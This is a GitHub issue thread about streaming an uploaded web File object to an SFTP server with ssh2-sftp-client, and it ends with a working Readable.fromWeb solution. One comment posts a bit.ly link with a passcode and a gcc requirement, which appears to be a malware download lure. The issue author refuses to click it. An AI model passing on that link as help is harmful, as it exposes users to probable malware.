### ISSUE TITLE
Using File.stream()

### ISSUE THREAD

**Issue by dadamssg** [theophilusx/ssh2-sftp-client#552]
I'm trying to make this work in my Remix app with [lazy files](https://github.com/mjackson/remix-the-web/tree/main/packages/lazy-file). I have an uploaded `File` from a multi part form submission but i can't seem to come up with anything that actually moves the file over.

```ts
await client.put(file.stream(), path.resolve(folder, filename));
```

I get this typescript error which is probably a hint:
> TS2345: Argument of type ReadableStream<Uint8Array> is not assignable to parameter of type string | Buffer | ReadableStream

I think there's a mismatch between a browser stream and node stream, maybe? I've never worked with anything this low level so  might be talking out of my butt.

I also tried manually coming up with a `File` instance:

```tsx
async function getFileInstance(filePath: string) {
  const buffer = await fs.readFile(filePath);
  return new File([buffer], "example.txt", { type: "text/plain" });
}

const storageKey = "test.txt";
const file = await getFileInstance(
  `/Users/me/code/app/scratch/${storageKey}`,
);

await client.put(file.stream(), path.resolve('/home/myuser', storageKey));
```
But i get this error:

> /Users/me/code/app/node_modules/ssh2-sftp-client/src/index.js:94
    const newError = new Error(msg);
                     ^
Error: put: Re-thrown: rdr.once is not a function
    at SftpClient.fmtError (/Users/me/code/app/node_modules/ssh2-sftp-client/src/index.js:94:22)
    at SftpClient.put (/Users/me/code/app/node_modules/ssh2-sftp-client/src/index.js:778:33)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async eval (/Users/me/code/app/app/sftp-file-storage.server.ts:28:7) {
  code: 'ERR_GENERIC_CLIENT',
  custom: true
}

I can get it to work if i grab the contents of the file and put it all into a buffer but i want to stream the contents to the server.
```ts
await client.put(
  Buffer.from(await file.arrayBuffer()),
  path.resolve('/home/myuser', storageKey),
);
```

Any guidance would be much appreciated!

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by dadamssg** [comment]
nah, i ain't clickin that. you responded _way_ too quick

**Comment by dadamssg** [comment]
User error 🤦‍♂️ 

I was closing the connection before the command finished

**Comment by theophilusx** [comment]
From what I can tell, your not actually creating a readable stream from
the contents of the file you want to upload. As a result, you get an
error which is basically saying that what you passed in was not a
working stream.

I've never used the File.stream() method. In fact, the buffers File
object was only added in node v19. I've always used the File system
fs.crweateReadStream() or the streams.create* stream methods to create
read/write streams. From what I can tell, the File object is more for
getting informationh about a file i.e. last modified time, path, size
etc.

There are lots of examples in the examples directory of the
ssh2-sftp-client repo. I use streams all the time to upload/download
files and do 'on the fly' transformations, such a zipping/unzipping data
as it is transferred.

Using the fs.createReadStream() method is also way more efficient than
first reading the data into a buffer and then writing it out via a
stream. Avoid buffers whenever possible as they are way less efficient
than just using streams.

You might find

npx stream-handbook

useful as it is short and provides a good overview on using node
streams.

Suggest you get a basic minimal example working useing just vanilla node
and then work out how to integrate that into your remix app.

**Comment by dadamssg** [comment]
That stream-handbook was helpful, thanks! I also found this which proved to be the missing piece: https://stackoverflow.com/a/74722656/728241

```ts
import { Readable } from "stream";
import { finished } from "stream/promises";

const writeStream = client.createWriteStream('/home/myuser/test.tsxt');
// @ts-ignore
const contents = Readable.fromWeb(file.stream());
await finished(contents.pipe(writeStream));
```

Thank you for pointing me in the right direction!
